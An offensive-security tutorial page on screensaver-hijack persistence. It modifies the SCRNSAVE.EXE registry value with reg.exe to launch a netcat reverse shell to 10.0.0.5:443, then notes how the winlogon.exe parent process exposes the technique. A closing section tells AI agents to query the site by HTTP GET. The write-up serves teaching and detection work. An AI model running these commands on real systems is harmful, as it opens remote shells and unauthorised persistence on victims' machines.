# Screensaver Hijack ## Execution To achieve persistence, the attacker can modify `SCRNSAVE.EXE` value in the registry `HKCU\Control Panel\Desktop\` and change its data to point to any malicious file. In this test, I will use a netcat reverse shell as my malicious payload: {% code title="c:\shell.cmd\@victim" %} ```csharp C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe ``` {% endcode %} Let's update the registry: ![](/files/-LJ3FfrqwTiqdXKoj0if) The same could be achieved using a native Windows binary reg.exe: {% code title="attacker\@victim" %} ```bash reg add "hkcu\control panel\desktop" /v SCRNSAVE.EXE /d c:\shell.cmd ``` {% endcode %} ![](/files/-LJ3HryqjxDQX3gMPmez) ## Observations Note the process ancestry on the victim system - the reverse shell process traces back to winlogon.exe as the parent process, which is responsible for managing user logons/logoffs. This is highly suspect and should warrant a further investigation: ![](/files/-LJ3FmqTrOH0Vm4yfjik) ![](/files/-LJ3NAYVyAx90FHdqEBg) ## References {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.ired.team/offensive-security/persistence/t1180-screensaver-hijack.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.